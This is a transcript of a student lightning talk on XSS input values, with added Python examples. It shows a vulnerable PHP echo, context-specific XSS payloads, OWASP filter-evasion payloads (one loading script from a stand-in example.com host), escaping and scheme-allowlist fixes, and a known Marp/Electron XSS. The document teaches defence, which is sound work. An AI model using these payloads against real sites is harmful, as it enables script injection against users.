Looking into XSS input values (XSSの入力値を調べてみた / searching xss insertion value)
Tomoyuki KOYAMA
February 03, 2018
Technology
Student LT at freee, 2018/02/03
Transcript
Looking into XSS input values

Speaker: Tomoyuki KOYAMA, first-year undergraduate (B1). Twitter: @tmyk_kym, blog: https://blog.koyama.me/. Interests: network, web, server, security. PyCon JP, Seccamp (Security Camp), etc.

What is XSS? XSS (Cross Site Scripting) is what happens when untrusted input is written into an HTML page without being neutralized, so attacker-supplied markup or script becomes part of the page and runs in the victim's browser. CWE-79: Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') (CWE 3.0).
A minimal vulnerable page (PHP):

<!doctype html>
<meta charset="utf-8">
<title>XSS Sample</title>
<h1><?php echo $_GET['mode']; ?></h1>

With $_GET['mode'] = hello the server returns:

<!doctype html>
<meta charset="utf-8">
<title>XSS Sample</title>
<h1>hello</h1>

With $_GET['mode'] = <script>alert()</script> the value is echoed unchanged, so the script element becomes part of the page and executes:

<!doctype html>
<meta charset="utf-8">
<title>XSS Sample</title>
<h1><script>alert()</script></h1>
Kinds of XSS: Stored XSS (persistent), Reflected XSS (non-persistent), DOM Based XSS.

XSS == XSS? The vulnerability class is the same, but the input value that triggers it depends on where in the HTML the value lands. Typical payloads, by context:

<script>alert(1)</script>                inside element content
"><script>alert(1)</script>              breaking out of a quoted attribute
" onmouseover="alert(1)                  adding an event-handler attribute
x" onerror="alert(1)                     inside an img src attribute
javascript:alert(1)                      inside an a href attribute
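As an added example (not code from the original slides), the slide's PHP echo is reproduced in Python next to an escaped version and run against the payloads listed above. It also shows the case escaping alone cannot fix: the href payload contains no HTML metacharacter, so html.escape passes it through unchanged and the URL scheme has to be allowlisted. The SAFE_SCHEMES set and the render_* function names are assumptions made for this example.

```python
import html
from urllib.parse import urlsplit

# Constructed inputs: the payloads from the slide, each aimed at a different
# HTML context.
PAYLOAD_TEXT = "<script>alert(1)</script>"          # element content
PAYLOAD_BREAK_ATTR = '"><script>alert(1)</script>'   # close the attribute and tag
PAYLOAD_EVENT_ATTR = '" onmouseover="alert(1)'       # add an event handler
PAYLOAD_IMG_SRC = 'x" onerror="alert(1)'             # img src
PAYLOAD_HREF = "javascript:alert(1)"                 # a href


def render_h1_vulnerable(mode: str) -> str:
    """Same as the slide's PHP: <h1><?php echo $_GET['mode']; ?></h1>.
    The value is echoed as-is, so markup in it becomes part of the page."""
    return f"<h1>{mode}</h1>"


def render_h1(mode: str) -> str:
    """Fixed version: HTML-escape the value before it lands in element content.
    quote=True also turns '"' and "'" into character references, so the same
    function is safe for values placed inside quoted attributes."""
    return f"<h1>{html.escape(mode, quote=True)}</h1>"


def render_img(src: str) -> str:
    """Value inside a double-quoted attribute. Escaping '"' keeps
    'x" onerror="alert(1)' from terminating the src attribute early."""
    return f'<img src="{html.escape(src, quote=True)}">'


# Assumption for this example: the schemes this page is willing to link to.
SAFE_SCHEMES = {"http", "https", "mailto"}


def render_link(url: str) -> str:
    """href is different: 'javascript:alert(1)' has no HTML metacharacter, so
    html.escape returns it unchanged. The scheme has to be allowlisted.
    Browsers strip ASCII tab/newline from a URL before parsing it, so do the
    same before looking at the scheme, or 'java\\tscript:' slips past."""
    cleaned = "".join(ch for ch in url if ch not in "\t\n\r").strip()
    scheme = urlsplit(cleaned).scheme.lower()
    if scheme and scheme not in SAFE_SCHEMES:
        cleaned = "#"  # refuse javascript:, data:, and anything else unknown
    return f'<a href="{html.escape(cleaned, quote=True)}">link</a>'


if __name__ == "__main__":
    print(render_h1_vulnerable(PAYLOAD_TEXT))  # the script element survives
    print(render_h1(PAYLOAD_TEXT))             # &lt;script&gt; ... as text
    print(render_img(PAYLOAD_IMG_SRC))         # '"' becomes &quot;
    print(render_h1(PAYLOAD_HREF))             # unchanged: escaping is a no-op here
    print(render_link(PAYLOAD_HREF))           # href="#"
```

Escaping is applied at output time, per context; the input itself is never "cleaned". The href check is the one place a value has to be rejected rather than encoded, because the dangerous part (the scheme) is made of ordinary characters.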
Where to find more input values: the OWASP XSS Filter Evasion Cheat Sheet (Japanese translation published by JPCERT/CC, 2015): https://jpcertcc.github.io/OWASPdocuments/CheatSheets/XSSFilterEvasion.html

Three entries picked from the cheat sheet, tried in a browser, with the DOM the browser built from each:
[1] <SCRIPT/XSS SRC="http://example.com/xss.js"></SCRIPT>
The tag name ends at the "/", so the browser reads XSS as a valueless attribute and still creates the script element. Resulting DOM: <script xss="" src="http://example.com/xss.js"></script>. A filter that looks for "<script" followed by whitespace or ">" never sees it.

[2] <<SCRIPT>alert("XSS");//<</SCRIPT>
The HTML parser is lenient: a "<" that is not followed by a tag name is emitted as ordinary text, and the following <SCRIPT> still opens a script element. The DOM holds a text node "<" followed by <script>alert("XSS");//<</script>. A filter that pairs each "<" with the next ">" and compares the text in between against a tag list sees "<SCRIPT" rather than "SCRIPT".

[3] <img src=x onerror=javascript:alert('XSS')>, with part of the onerror value written as hexadecimal numeric character references (&#x...;) instead of literal characters.
Character references are decoded inside attribute values, so the DOM holds <img src="x" onerror="javascript:alert('XSS')">. The handler fires because src=x fails to load, and inside an event handler "javascript:" is just a JavaScript label, so the alert runs. A filter that greps the raw input for "javascript:" does not match.

Also tried, from the same cheat sheet:
<img src=javascript:alert('XSS')>
<img src=javascript:alert(String.fromCharCode(88,83,83))>
<META HTTP-EQUIV="refresh" CONTENT="3;URL=http://;URL=http://yahoo.co.jp/;">
Current browsers do not execute javascript: URLs in an img src, so the first two no longer run; the meta refresh is a redirect (the second URL= wins), not script execution.
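Added example, not from the slides or from OWASP: a toy input filter of the kind these three cheat-sheet entries defeat, beside a minimal reimplementation of the HTML tokenizer rules that make them work (a "<" is only a tag start when an ASCII letter follows, the tag name ends at whitespace, "/" or ">", names are case-insensitive, and character references in attribute values are decoded). The inputs are constructed; the hex-encoded onerror value is my own encoding of the whole value, since the transcript does not preserve the slide's exact encoding.

```python
import html
import re

# Constructed inputs modelled on the three cheat-sheet entries discussed above.
SCRIPT_SRC_ATTR = '<SCRIPT/XSS SRC="http://example.com/xss.js"></SCRIPT>'
EXTRA_BRACKET = '<<SCRIPT>alert("XSS");//<</SCRIPT>'
HEX_ONERROR = (  # every character of the handler as a hex reference (my encoding)
    "<img src=x onerror="
    + "".join(f"&#x{ord(c):x};" for c in "javascript:alert('XSS')")
    + ">"
)
PAYLOADS = [SCRIPT_SRC_ATTR, EXTRA_BRACKET, HEX_ONERROR]


def naive_is_dangerous(markup: str) -> bool:
    """The kind of filter the cheat sheet defeats: pair each '<' with the next
    '>', take the first whitespace-delimited token as the tag name, and grep
    the raw text for 'javascript:'."""
    names = []
    for inner in re.findall(r"<([^>]*)>", markup):
        tokens = inner.split()
        if tokens:
            names.append(tokens[0].lower())
    return "script" in names or "javascript:" in markup.lower()


# name, then optionally = and a double-quoted, single-quoted or unquoted value
_ATTR_RE = re.compile(r'''[\s/]*([^\s/=>]+)(?:\s*=\s*(?:"([^"]*)"|'([^']*)'|([^\s>]*)))?''')


def _parse_attrs(text: str) -> dict:
    """Attribute names are case-folded and character references inside values
    are decoded, as in the HTML attribute-value states. First value wins."""
    attrs = {}
    for m in _ATTR_RE.finditer(text):
        raw = next((g for g in m.group(2, 3, 4) if g is not None), "")
        attrs.setdefault(m.group(1).lower(), html.unescape(raw))
    return attrs


def browser_tags(markup: str) -> list:
    """Subset of the HTML tokenizer's tag-open and tag-name states, enough to
    show why the payloads work. Returns (name, is_end_tag, attrs) tuples.
    Teaching code only: e.g. a '>' inside a quoted value is not handled."""
    tags = []
    i, n = 0, len(markup)
    while i < n:
        if markup[i] != "<":
            i += 1
            continue
        j = i + 1
        is_end = j < n and markup[j] == "/"
        if is_end:
            j += 1
        if not (j < n and markup[j].isascii() and markup[j].isalpha()):
            i += 1  # a '<' not followed by a letter is plain text, as in <<SCRIPT>
            continue
        k = j
        while k < n and markup[k] not in " \t\n\r\f/>":
            k += 1  # tag name stops at whitespace, '/' or '>', so SCRIPT/XSS -> script
        end = markup.find(">", k)
        if end == -1:
            end = n
        tags.append((markup[j:k].lower(), is_end, _parse_attrs(markup[k:end])))
        i = end + 1
    return tags


def browser_is_dangerous(markup: str) -> bool:
    """Same blocklist as naive_is_dangerous, applied to what the browser
    would actually build from the input."""
    for name, is_end, attrs in browser_tags(markup):
        if is_end:
            continue
        if name == "script":
            return True
        if any("javascript:" in v.lower() for v in attrs.values()):
            return True
    return False


if __name__ == "__main__":
    for p in PAYLOADS:
        print(f"{p!r}\n  naive={naive_is_dangerous(p)} browser={browser_is_dangerous(p)}")
```

All three pass the raw-text filter and are recognised once the input is parsed the way a browser parses it. The lesson is not to write a better blocklist: the browser's tokenizer is the only parser whose opinion counts, so the reliable fix is context-aware output escaping (or a real HTML sanitizer that parses first), not filtering input strings.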
Trying the same thing outside a browser: Marp, a Markdown presentation editor built on Electron. Electron renders the slide preview in a web view, so a Markdown slide containing <script>alert()</script> popped an alert. The Markdown input was XSS input too.

Was this already known? Looking it up: JVN#21174546 (JavaScript execution vulnerability in Marp), https://jvn.jp/jp/JVN21174546/. From the project's issue tracker, "[Security issue] Remote script can read user local resource" · Issue #187 · yhatt/marp, which notes: "However, sanitizing inline script should consider on future."

Takeaway: an XSS input value is not only about alert(). In an Electron app the same input that shows an alert in a browser runs with access to the user's machine, and, as the issue title says, script can read the user's local resources. Markdown and other "document" inputs rendered in a web view have to be treated as untrusted HTML.